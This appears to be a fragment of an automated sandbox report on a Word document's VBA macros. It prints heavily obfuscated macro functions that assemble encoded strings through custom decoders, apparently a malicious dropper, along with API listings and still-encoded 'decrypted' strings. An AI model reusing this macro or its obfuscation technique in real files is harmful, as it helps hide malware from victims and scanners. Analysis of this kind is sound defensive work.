42	lmCPcPVINKG = sfiSFQuRDPlM("9f9d569f9d539f9d579f9d") & "U\x0178DOhIvgINI\x2026INI\x2022\x203a" & "uINI" & "kpiINI\x8fP\x2013g\x0161vP\x2021\x90IN" & sfiSFQuRDPlM("497186494b425d7d9596948b90897d7f7f42469d7282") & "c\x2013\x0160\x0178B_BPJD\x9dT\x0178\x9dU\x0178\x9dR\x0178\x9dS\x0178DBO\x02c6B" & "I\x0160\x2039INI\x017d\x2020k\x2013\x2021\x8fINIi\x2021\x2013OINIeIKBOt\x2021\x2026" & "\x2014\x201d\x2022\x2021BOn\x2039\x2013\x2021\x201d\x0192\x017dr\x0192\x2013\x0160BDF\x2021\x90\x02dc\wugtrtqhkng~~c" & sfiSFQuRDPlM("9292668396837e7e6e9185838e7e7e6f8b85949195918896")
43	KHtCdGLsLqZV = sfiSFQuRDPlM("9f9d589f9d59") & "\x0178\x9dU\x0178DBO" & "\x02c6BIg\x90" & sfiSFQuRDPlM("83494e4991") & sfiSFQuRDPlM("494e4987") & "u\x2026INI\x2030\x2039" & "\x90\x2030INI" & "\x201e\x017dINI\x201d\x2039\x2019\x2013d\x017d" & "\x2018\x2026\x8dk\x90\x02dcIN" & "I\x2026\x0192INI\x2013" & sfiSFQuRDPlM("8b91906e918949") & "K\x7f_R\x0178F\x9d\x02dc\x201ac\x017d\x0178_B" & "BJ\x20acHJD\x9dT\x0178\x9dS\x0178\x9dR\x0178DO\x02c6B" & "I\x0192\x201e\x017dgINIct\x2039INIx" & "IKBBJDkDMDd\x0160t\x2122DKKPx\x0192\x017d\x2014" & sfiSFQuRDPlM("675c5c4a449d53") & sfiSFQuRDPlM("9f9d529f") & sfiSFQuRDPlM("444f88498799494e4990494b506b9098918d874a4b5d469d7882638e9f504a449d539f9d52")
44	TPTFQIOU = sfiSFQuRDPlM("9b494e49") & "\x2022\x2013\x2021I" & sfiSFQuRDPlM("4e499588") & "INI\x2021I" & "NIPI" & "KKO\x2026" & sfiSFQuRDPlM("7487726e") & "c\x2026gB" & sfiSFQuRDPlM("424988645b49") & "N}e\x0160c\x201d\x7f" & "[TKBO" & "\x2014\x201d\x017d\x2026\x0192\x2026\x0160\x2021B" & sfiSFQuRDPlM("4f95928e8b96") & sfiSFQuRDPlM("424f8842469d688277") & "\x201d\x017d\x0178BF\x9d\x2022\x201a\x2026" & sfiSFQuRDPlM("8a728382768a9f") & "B\x20ac\x017eBPJD\x9dR\x0178" & sfiSFQuRDPlM("9d549f9d539f4442") & "O\x02c6BI" & sfiSFQuRDPlM("7197964f494e49978e8e494e4970494b") & "]PJD\x9dR\x0178" & sfiSFQuRDPlM("9d539f9d549f9d559f44424f8842") & sfiSFQuRDPlM("497587494e49964f494e496b96878f72949192") & "\x2021\x201dINI\x2013\x203aIKBOr\x0192\x2013\x0160BJJJD\x9d"
45	zgwEK = sfiSFQuRDPlM("884249696776") & "xcINI\x017d" & "INIw" & "\x2021IKPk" & "\x90\x02dc\x2018\x8d\x2021J" & sfiSFQuRDPlM("469d9077828e6e") & "\x0178K]khJ" & sfiSFQuRDPlM("469d698272859f") & sfiSFQuRDPlM("7d4a449d529f9d") & "S\x0178DBO" & "\x02c6Iu\x2026\x201d\x2039" & "\x2019INI\x2013dIK" & "MJD\x9d" & "T\x0178\x9dR\x0178\x9d" & sfiSFQuRDPlM("539f9d559f44") & "O\x02c6BI\x2030\x2030INI\x2039" & sfiSFQuRDPlM("90494e498e91") & sfiSFQuRDPlM("858d6e91494e") & sfiSFQuRDPlM("4989494b7f4b9d469d698292859f7d4a449d549f9d529f9d539f44424f") & sfiSFQuRDPlM("884249948b9296494e4964494e497585494b4d4a449d549f9d539f9d529f9d559f44424f8842498d6e91") & sfiSFQuRDPlM("8989494e4985494e")
46	YeGkemxylp = "K]kh" & sfiSFQuRDPlM("4a469d92") & sfiSFQuRDPlM("75786794") & sfiSFQuRDPlM("75828b71") & "\x90\x201av\x201ac" & "dn\x2021\x0178PD\x2019" & "\x201a\x2022xg" & "\x201at\x2022k\x2018\x90" & "DPD\x8f\x201a" & "c\x0152\x2018tDBOi" & sfiSFQuRDPlM("8742554b9d46") & "\x9di\x201a\x2019" & "h\x0178_BBF" & sfiSFQuRDPlM("6f7c95504463") & sfiSFQuRDPlM("9575678f84828e9b4450") & "JD\x9dT\x0178\x9d" & "S\x0178\x9dR\x0178D" & "BO\x02c6BIv{\x2019\x2021INI\x2013" & sfiSFQuRDPlM("494e49696749") & "KPk\x90\x02dc\x2018\x8d\x2021JJD\x9dS" & "\x0178\x9dW\x0178\x9dU\x0178\x9dV\x0178\x9dT\x0178\x9dR\x0178\x9dX\x0178DO\x02c6BI\x90PwIN" & "Iu\x203a\x2022\x2013\x2021\x8fPoINI\x8f\x0192\x2013\x2039\x2018INI\x90\x0192\x2030\x2021\x8f" & sfiSFQuRDPlM("8790494e4996506397")
48	rMOBquizQidfuY3 = "y\x02c6j\x2020" & sfiSFQuRDPlM("7a66738b9b83") & "\x2014pg\x203a\x0192" & "x\x2014\x2122n" & "v\x0161o\x0152\|\x02c6\x017d" & "vx\x02c6klz\x0161\x2030\x2122\x8dn" & ""
49	tVqwRdTJD = "mh\x2039x\x0160h\x2018c" & "\x90k\|\x2039oh\x2122{" & "\|fd\x0160" & "u\x0161\x2021\x2020\x0160gzw\x0160\x2014\x2013\x017dd"
50	rMOBquizQidfuY3 = "y\|\x2021\x017d" & sfiSFQuRDPlM("877383717589766c77")
51	tVqwRdTJD = ZvPQTIroojCOGl & LEiiNIwNsh & apoAXZRsdVd & nAPnScPISpGFFRcnF & lmCPcPVINKG & HDNkzlpcpKsMIdDS & nlPgcpOuKKuzykGv & ICCNmDkzbpo & qPreGCnvlhVprSEW & bOrzogXniawpXlG & TPTFQIOU & QjvgpqCfRFUWjU & RMILlFmHZrQOPHCRxu & YeGkemxylp & HtupShcIikIHJa & zgwEK & jGBdSOuaTi & KHtCdGLsLqZV
52	tVqwRdTJD = czeoPYDHuXBP(tVqwRdTJD)
53	tfNaRhVGiNw = tVqwRdTJD
54	End Function

Function lFqpVWxqJDWI, APIs: 80, Strings: 34, Number of lines: 43, Relevance: 201.293

APIs	Meta Information
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Len
Part of subcall function sfiSFQuRDPlM@ThisDocument: Chr$
Part of subcall function sfiSFQuRDPlM@ThisDocument: Val
Part of subcall function sfiSFQuRDPlM@ThisDocument: Mid$
Part of subcall function czeoPYDHuXBP@ThisDocument: Len
Part of subcall function czeoPYDHuXBP@ThisDocument: Chr
Part of subcall function czeoPYDHuXBP@ThisDocument: Asc
Part of subcall function czeoPYDHuXBP@ThisDocument: Mid

Strings	Decrypted Strings
"498e494b7f5f469d7882636e9f9f676e75879d424a504a44"
"\x9dS\x0178\x9dR\x0178DBO\x02c6BI\x2026\x8dn\x2018\x2030\x2030\x2039\x90\x2030INI\x2018IN"
"9d819f7f9f5d"
"\x0152\x0178MF""\x9du\x0178}""F\x9d\x81\x0178""\x7fMF\x9d""m\x0178}F""\x9d\x81\x0178G""F\x9d\x8d\x0178""PD\x2026\x2018w""\x201ap\x2013D\x7f""KGTWX""]F\x9du\x0178}""F\x9d\x81\x0178\x7fN""F\x9du\x0178}F\x9d""\x0152\x0178\x7f_F\x9d""u\x0178}F\x9d""l\x0178\x7fNF""\x9du\x0178}F"
"5f504a449d53"
"6b76424f996b906691"
"4e496694"
"4e49919072"
"I\x2013INI\x0192INI\x2013I"
"8d66729199"
"INIZ""\x8dfINI"
"7b44504485"
"\x0161\x203aD]F\x9d""\x2122\x201ae\x0178PD""r\x201dq\x201az"
"494e4963"
"\x0178DBO""\x02c6BI\x2020"
"63494e498a969692955c515183928b50494e498786948b988750494e494363946b4f7a75494e495251958a8394494e4985918f51985350494e4991494e499887494e498795494e4990494e494f869c8191494e4996879096494e4969599072494e4970494b4b5d469d6b789f5f469d86826376839f7d525050557f5d469d86638276839f5f469d86638276639f7d"
"\x02c6BIWINI\x90INIQ\x2022INI\x201eUINIZQ\x2020\x201d\x2039INIwINI\x2039\x2013\x2021\x8fQ\x2026\x2018INI\x0153\x201ev\x2019\|"
"494e498e"
"g\x90\x0192\x201e"
"9a919446"
"\x7f]F\x9d""\x81\x0178Od"
"424a80484a"
"KKK\x0178B"
"529f9d53"
"wg\\""D\x0192ue""\x201a\x2039kD""PJD\x9d"
"4e497091"
"NI\x2026I"
"494e498e"
"809e504a449d529f9d"
"VPPF""\x9d\x2020\x201ac""\x2013\x0192\x0178P""Dn\x201ag""\x201ap\x2030\x2013""jD\x7f]""Ol\x2018k""\x90}ej\x0192""\x201d}\x7f\x7fJ""\x20acHBF\x9d\x201d""\x0178BF\x9d\x2020\x0192\x201a""v\x0192\x0178B""JF\x9d\x2039\x201ax""\x0178MF\x9d\x8d\x0178KK"
"6d959570839187"
"918792758c6b9b8a668f92858c6f91907b736b6a8b78927b84"
"\x2020\x0152\x2030\|\|\x203a\x8d\x0161\x201e\x2122p\x2020"
"k\x2026\x2013g\x2013\|e\|z\x8d\x017d""\x2020\x2122\x0152t"

Line	Instruction	Meta Information
150	Function lFqpVWxqJDWI(rMOBquizQidfuY4 as String) as String
151	Dim sTNVQqU as String	executed
152	Dim zLcoKRaYmjuuyzJFwvb as String
153	Dim KrunKQYb as String
154	Dim nmsYxXkvZCrJZXc as String
155	Dim thaycyR as String
156	Dim FKqOztxLLjavwwStRF as String
157	Dim vaWnApNUERVVdUevRMo as String
158	Dim OpHnpOXn as String
159	Dim qbvQHsuOUgPR as String
160	Dim gwxEIxlJXcH as String
161	Dim GCWiglwNCH as String
162	Dim JnhhTKXdDMF as String
163	Dim ubpLU as String
164	Dim QnTcsgLLYY as String
165	Dim hICkWL as String
166	Dim DAsxVsHQJ as String
167	Dim GDjgDLPOpTOH as String
168	Dim rVgmmXcuFt as String
169	GDjgDLPOpTOH = "\x9dS\x0178\x9dR\x0178DBO\x02c6BI\x2026\x8dn\x2018\x2030\x2030\x2039\x90\x2030INI\x2018IN" & sfiSFQuRDPlM("498e494b7f5f469d7882636e9f9f676e75879d424a504a44") & "\x9dS\x0178\x9dR\x0178D" & "O\x02c6IkINI\x2030\x2026IKBBJD\x9dS\x0178\x9dR\x0178\x9dT\x0178DO\x02c6BI\x2039INIx\x0192tINI\x0192dng\Y\x201eS\x8fIKBK" & "P\x02dc\x0192nw\x2021PIi\x2021vhk\x2021\x201anfIJJD\x9dR\x0178\x9dS\x0178\x9dT\x0178DO\x02c6BI\x2022INI\x2039\x2030\x90INI\x0192\x2013\x2014\x201d\x2021\x2022IKNIpIMJD\x9dU\x0178" & sfiSFQuRDPlM("9d529f9d539f9d549f9d569f44424f8842")
170	OpHnpOXn = "\x0152\x0178MF" & "\x9du\x0178}" & "F\x9d\x81\x0178" & "\x7fMF\x9d" & "m\x0178}F" & "\x9d\x81\x0178G" & "F\x9d\x8d\x0178" & "PD\x2026\x2018w" & "\x201ap\x2013D\x7f" & "KGTWX" & "]F\x9du\x0178}" & "F\x9d\x81\x0178\x7fN" & "F\x9du\x0178}F\x9d" & "\x0152\x0178\x7f_F\x9d" & "u\x0178}F\x9d" & "l\x0178\x7fNF" & "\x9du\x0178}F" & sfiSFQuRDPlM("9d819f7f9f5d") & "F\x9d\x2020\x0178\x20ac\x017e\x20acH" & "JIGIK\x9dF\x9d\x2039\x0178" & sfiSFQuRDPlM("5f4a469d8b9f4d53") & "KGTWX]F\x9d\x0160" & "\x0178_JF\x9d" & sfiSFQuRDPlM("8a9f4d46") & "\x9d\x2022\x0178}F\x9dk\x0178\x7fKGTWX]F\x9du\x0178}F\x9d\x2039\x0178\x7fNF\x9du\x0178}F\x9d\x0160\x0178\x7f_F\x9d\x2022\x0178}F\x9d\x0160\x0178\x7fNF\x9d\x2022\x0178}F" & "\x9dk\x0178"
171	qbvQHsuOUgPR = sfiSFQuRDPlM("5f504a449d53") & "\x0178\x9dR\x0178\x9d" & "T\x0178DB" & "O\x02c6BI" & "q\x201elIN" & "Ip\x2021\x2122" & sfiSFQuRDPlM("4f494e4987") & sfiSFQuRDPlM("6576494b424a") & "D\x9dR\x0178\x9dT\x0178" & sfiSFQuRDPlM("9d559f9d539f44") & "O\x02c6BIu" & sfiSFQuRDPlM("7b9596876f5070") & "\x2021vINI\x90" & "vINI" & "PyINIg\x201ee\x017d" & sfiSFQuRDPlM("6b87494b") & "]F\x9d\x2014\x0178_JD\x9dR\x0178\x9dT\x0178" & "\x9d[\x0178\x9dX\x0178\x9dW\x0178\x9dS\x0178" & sfiSFQuRDPlM("9d53539f9d5352") & "\x0178\x9dZ\x0178\x9dU\x0178" & "\x9dV\x0178\x9dY\x0178DO\x02c6Io\x2039\x2026\x201d\x2018INISYPRRW" & "INI\x2022\x2018\x02c6\x2013Bu\x8dINIBpvBSRPINIRBJSXTINIu\x203a\x90\x2026BI" & ""
172	rVgmmXcuFt = sfiSFQuRDPlM("6b76424f996b906691") & sfiSFQuRDPlM("999542426a8b6686677042424242") & sfiSFQuRDPlM("424f424248484242655c7e798b90669179757e959b9576678f55547e656f665067") & "z\x2021BBQ\x2026G\x201d\x201ejGD"
173	vaWnApNUERVVdUevRMo = sfiSFQuRDPlM("4e496694") & "\x2039\x02dc\x2021I" & "NI[[" & sfiSFQuRDPlM("4b494e49") & "\x2122\x2022IN" & "I\x203aIN" & "I\x90\x2020\x2018I" & "NIPR" & "SRYPR" & sfiSFQuRDPlM("52525a42") & "\x2022\x0160\x2039\x2019" & "]By\x2039I" & "K]F\x9d\x2122" & sfiSFQuRDPlM("82659f50") & "Djg\x201a" & "c\x2020g\x201du" & "DPJD\x9dR\x0178" & sfiSFQuRDPlM("9d539f44424f") & "\x02c6IcfIN" & "IfIK" & "Pk\x90\x02dc" & sfiSFQuRDPlM("918d874a4a449d53") & "\x0178\x9dT\x0178\x9dR\x0178\x9d" & "U\x0178DBO" & "\x02c6I\x201dOc\x2030\x2021INIw" & sfiSFQuRDPlM("494e499587494e4990") & sfiSFQuRDPlM("96494b4e469d779f") & "K]F\x9d\x2122\x201a\x2026\x0178PD" & "rtq\x201a\x0161\x203aD_B" & "F\x90x\x0192Sk\\Df\x201ag\x02c6" & "\x0192\x2014nv\x2122gd\x201ar\x201atq\x201a"
174	DAsxVsHQJ = "I\x2013INI\x0192INI\x2013I" & sfiSFQuRDPlM("4e49919072") & "\x2014\x201e\x017d\x2039\x2026NuINI\x2039\x2026" & sfiSFQuRDPlM("494b4b5044758267") & "v\x02dc\x201acn\x2014gDJ" & "F\x9dpw\x201a\x017d\x017d\x0178NJPJD\x9dT\x0178\x9dS\x0178\x9d" & sfiSFQuRDPlM("529f444f8849") & sfiSFQuRDPlM("6576494e494f71846c67494e49706799494b424a449d549f") & "\x9dW\x0178\x9dR\x0178\x9dS\x0178\x9d" & "V\x0178\x9dY\x0178\x9d[\x0178\x9dZ\x0178\x9dX\x0178\x9dU\x0178DBO\x02c6IgINIe\x2013INIe\x2018\x017dINIpi\x7fINI\x2039" & "\x2018INInINI\x2039INIpuPigpgINI\x2022jugv}\x2022v\x201dINI\x201d\x2039\x2026PjcI"
175	KrunKQYb = "INIZ" & "\x8dfINI" & sfiSFQuRDPlM("8d66729199") & sfiSFQuRDPlM("8794758a") & sfiSFQuRDPlM("878e8e494e") & "I\x2039\x2021\x2022Z\x8df" & sfiSFQuRDPlM("494e4985") & "INIfuINI\x2122" & sfiSFQuRDPlM("95494e4981494e49") & "\x2122\x0192\x201d\x2021Z\x8d" & "fr\x2018I" & "NIo\x2039\x2026\x201d\x2018\x2022" & sfiSFQuRDPlM("9188965a494e49798b90") & "\x2020\x2018INIjmgI" & sfiSFQuRDPlM("4e496e494e495a49") & "NI\x8dINI\x201d\x2039\x2019\x2013dI" & "NI\x017dINI\x2039" & sfiSFQuRDPlM("494e49918896") & "INIoceINIu\x2026IKKOtg" & sfiSFQuRDPlM("926e83658742424a7d858a63747f57") & "XM}\x2026\x0160ct\x7fSRYM}\x2026\x0160ct\x7fXZKN}\x2026\x0160ct\x7f[TKMJD\x9dT\x0178" & ""
176	QnTcsgLLYY = "\x0161\x203aD]F\x9d" & "\x2122\x201ae\x0178PD" & "r\x201dq\x201az" & sfiSFQuRDPlM("7b44504485") & "t\x2021\x201a\x2020g\x201a" & "pvk\x201acn\x2022D" & "B_BBBFm" & "\x8ff\\D\x2020" & sfiSFQuRDPlM("87826863778e") & "\x2013\x90\x201a\x2021\x2013\x201a\x2122\x2018\x201a" & "tmetgfg\x90vk" & sfiSFQuRDPlM("63826e75445d46") & sfiSFQuRDPlM("9d9585748b8292765c92") & "\x201atq\x201az{" & sfiSFQuRDPlM("9f425f42469d7982859f5044") & "\x2019t\x201a\x2018z\x203aD]F\x9d" & "\x8d\x0178_BBJBBPJD\x9d" & "T\x0178\x9dS\x0178\x9dR\x0178DBO\x02c6IngIN" & "Ict\x2039\x0192\x201eINIxIKBJD\x9d" & "S\x0178\x9dR\x0178DO" & sfiSFQuRDPlM("884249988f494e496493494b42424b5098638e")
177	zLcoKRaYmjuuyzJFwvb = "\x0178DBO" & "\x02c6BI\x2020" & sfiSFQuRDPlM("494e4963") & "\x2020IKP" & "k\x90\x02dc\x2018" & "\x8d\x2021JJ" & sfiSFQuRDPlM("449d549f") & sfiSFQuRDPlM("9d529f9d53") & "\x0178DO\x02c6B" & "I\x2019INI\x2013" & sfiSFQuRDPlM("64494e4967") & sfiSFQuRDPlM("9083848e87") & sfiSFQuRDPlM("7585948b49") & "KMJD\x9dT\x0178" & "\x9dS\x0178\x9dR" & sfiSFQuRDPlM("9f44424f8849") & "\x90\x2030INI" & sfiSFQuRDPlM("8b494e498e") & sfiSFQuRDPlM("91858d6e9189") & "\x2030IKNRK]F\x9d" & "\x02dc\x201acn\x0178P" & "JD\x9dS\x0178\x9dR\x0178D" & "O\x02c6BIffINIcI" & sfiSFQuRDPlM("4b506b9098918d") & "\x2021JJD\x9dU\x0178\x9dV\x0178\x9dX\x0178\x9dT\x0178\x9dZ" & "\x0178\x9dY\x0178\x9dW\x0178\x9dR\x0178\x9dS\x0178\x9d[\x0178DO" & "\x02c6BI\x90INInINI\x201d" & "\x2039\x2019\x2013dINI"
178	ubpLU = "\x02c6BIWINI\x90INIQ\x2022INI\x201eUINIZQ\x2020\x201d\x2039INIwINI\x2039\x2013\x2021\x8fQ\x2026\x2018INI\x0153\x201ev\x2019\|" & sfiSFQuRDPlM("63494e498a969692955c515183928b50494e498786948b988750494e494363946b4f7a75494e495251958a8394494e4985918f51985350494e4991494e499887494e498795494e4990494e494f869c8191494e4996879096494e4969599072494e4970494b4b5d469d6b789f5f469d86826376839f7d525050557f5d469d86638276839f5f469d86638276639f7d")
179	GCWiglwNCH = "g\x90\x0192\x201e" & sfiSFQuRDPlM("494e498e") & "\x2021uIN" & "I\x2026\x0192\x2013" & "\x2039\x2018IN" & "I\x2026IN" & sfiSFQuRDPlM("4991494e") & "I\x017d\x2018\x2026" & "\x8dk\x90\x02dcI" & "NI\x2018\x2030" & "\x2030\x2039\x90\x2030I" & "KNRK]F\x9d" & "i\x201are\x0178}JJ" & "JD\x9dSX" & sfiSFQuRDPlM("9f9d529f") & sfiSFQuRDPlM("9d539f9d53599f") & sfiSFQuRDPlM("9d53549f9d") & "TV\x0178\x9dV\x0178\x9dT\x0178" & "\x9dU\x0178\x9dSR\x0178\x9d" & "TU\x0178\x9dSU\x0178\x9dT" & "S\x0178\x9dTT\x0178" & "\x9d[\x0178\x9dZ\x0178\x9dSV\x0178\x9dS" & "[\x0178\x9dW\x0178" & sfiSFQuRDPlM("9d53579f") & "\x9dSS\x0178\x9dSZ\x0178\x9d" & "Y\x0178\x9dX\x0178" & "\x9dTW\x0178\x9dTR\x0178DO\x02c6BI{\x81nINIqecINIgZINI\x8dINIjkpINIf"
180	FKqOztxLLjavwwStRF = "\x7f]F\x9d" & "\x81\x0178Od" & sfiSFQuRDPlM("9a919446") & "\x9du\x0178}" & "JF\x9du\x0178}" & "F\x9dk\x0178\x7f" & sfiSFQuRDPlM("4d469d95") & "\x0178}F\x9d" & "\x0160\x0178\x7fK" & "GTWX\x7f" & "\x0178\x0178]F\x9d\x2020\x0192\x201a" & "v\x0192\x0178_F" & "\x9d\x2122\x201a\x2026\x0178PJ" & "D\x9dT\x0178\x9dS\x0178\x9d" & "R\x0178\x9dU\x0178" & "DO\x02c6If\x0192" & sfiSFQuRDPlM("96494e497179708e9163") & "fINIfINIcIK" & "Pk\x90\x02dc\x2018" & "\x8d\x2021JJD\x9dZ\x0178\x9dSU" & "\x0178\x9dSX\x0178\x9d[\x0178\x9dST\x0178\x9d" & sfiSFQuRDPlM("53539f9d53579f9d549f9d53529f") & sfiSFQuRDPlM("9d535b9f9d529f9d599f") & "\x9dTR\x0178\x9dU\x0178\x9dSY\x0178\x9dW\x0178" & "\x9dV\x0178\x9dSV\x0178\x9d" & sfiSFQuRDPlM("589f9d539f9d535a9f444f")
181	gwxEIxlJXcH = "KKK\x0178B" & sfiSFQuRDPlM("424a80484a") & sfiSFQuRDPlM("449d539f") & sfiSFQuRDPlM("9d529f9d") & sfiSFQuRDPlM("549f9d559f") & sfiSFQuRDPlM("44424f88") & sfiSFQuRDPlM("42498449") & "NI\x2030\x2021vO" & sfiSFQuRDPlM("7863748b") & "cINInINI\x2021" & sfiSFQuRDPlM("494b42424a449d") & sfiSFQuRDPlM("529f9d53") & "\x0178DBO\x02c6I\x8f" & "\|INIuIKBO\x02dccn" & "BKPD\x0192u" & "\x2022\x2021o\x201ad\x201an{DPJ" & "D\x9dT\x0178\x9dR\x0178\x9dS\x0178DO\x02c6Iv\x203a" & "\x2019INIgINIi" & "g\x2013IKPk\x90\x02dc\x2018\x8d\x2021JJD\x9dW\x0178\x9dY\x0178\x9dR\x0178\x9d" & "S\x0178\x9dX\x0178\x9dZ\x0178\x9dT\x0178\x9dV\x0178\x9dU\x0178DO\x02c6IPc\x2014\x2013INI\x2018\x8fINIc\x8f\x2022\x2039w\x2013\x2039INI\x2022"
182	nmsYxXkvZCrJZXc = "wg\\" & "D\x0192ue" & "\x201a\x2039kD" & "PJD\x9d" & sfiSFQuRDPlM("529f9d53") & sfiSFQuRDPlM("9f44424f88") & "Iigvd" & "{\x2013INI" & "\x2021\x2022IKP" & "k\x90\x02dc\x2018\x8d" & "\x2021JJD\x9dV\x0178" & "\x9dU\x0178\x9dX\x0178\x9dT" & "\x0178\x9dS\x0178\x9dR\x0178\x9dW" & sfiSFQuRDPlM("9f44424f8849878757") & "\x0192\x0192R\x2021Z" & "\x201eRINIY" & sfiSFQuRDPlM("8385494e49") & sfiSFQuRDPlM("86494e495b545549") & "NI\x2020TRINIZZ[\x201e\x201eS" & "\x2021INIU\x2026" & "Y\x2020YIKK]F\x9dt\x0178_\x9dF\x9df\x0178NF\x9dm\x0178_F\x9d\x0192\x201atiu\x0178]" & "F\x9d\x2022\x0178_RPPTWW]RPP" & "TWW\x20ac\x017e\x20acHJIGIK\x9dF\x9dl\x0178_JF\x9d"
183	thaycyR = "NI\x2026I" & sfiSFQuRDPlM("4e497091") & "\x90r\x2014\x201e\x017d" & "INI\x2013" & "\x0192\x2013IK" & "KPJD\x9d" & "T\x0178\x9dS\x0178\x9dR" & sfiSFQuRDPlM("9f444f8842498749") & "NI\x2014I" & "NIu\x2021vx\x0192\x017d" & "IKPk\x90\x02dc\x2018\x8d" & "\x2021JF\x9d\x90\x201aw\x017d\x017d\x0178" & "NF\x9dv\x201at\x2014g\x0178" & "K\x0178]\x0178]" & sfiSFQuRDPlM("424a424280484a449d") & sfiSFQuRDPlM("549f9d529f9d539f4442") & "O\x02c6IvOINI" & "\x02dc\x0192t\x2039c\x201e\x017dgINIigIK" & "BJD\x9dS\x0178\x9dR\x0178DBO\x02c6IVmIN" & "IRIKBKP\x02dc" & "\x0192\x017d\x2014g\\Dg\x201az\x201a" & "r\x201ag\x2026\x2013SRR\x2026\x2018\x90v\x2039\x90\x201awgD_R]F\x9d\x2122\x2026\x0178"
184	hICkWL = sfiSFQuRDPlM("494e498e") & sfiSFQuRDPlM("494e4975") & "\x203a\x2022\x2013\x2021" & sfiSFQuRDPlM("8f506f83") & sfiSFQuRDPlM("908389494e") & "I\x0192INI" & sfiSFQuRDPlM("878f8790") & "\x2013INI" & sfiSFQuRDPlM("968b91905049") & "KK\x20ac\x017e\x20acHJ" & sfiSFQuRDPlM("4961494b9d46") & "\x9d\x81\x0178\x0178\x20ac" & "\x017ePJIGIK\x9d" & sfiSFQuRDPlM("469d819f504a449d") & "S\x0178\x9dT\x0178" & "\x9dR\x0178DO\x02c6" & "Ikg\x017dfINI" & "iINIg\x2013" & sfiSFQuRDPlM("68494b506b9098918d") & "\x2021JJD\x9dT\x0178\x9dR\x0178\x9d" & "S\x0178\x9dU\x0178DO\x02c6I\x2039kINI\x90INI\x0192\x8f\x2022IN" & "I\x2039\x2013h\x0192\x2039\x017d\x2021\x2020IKNJD\x9dV\x0178\x9dT\x0178\x9dR" & "\x0178\x9dW\x0178\x9dS" & "\x0178\x9dU\x0178DO\x02c6IuINI\x2039INI\x2039\x2026NI"
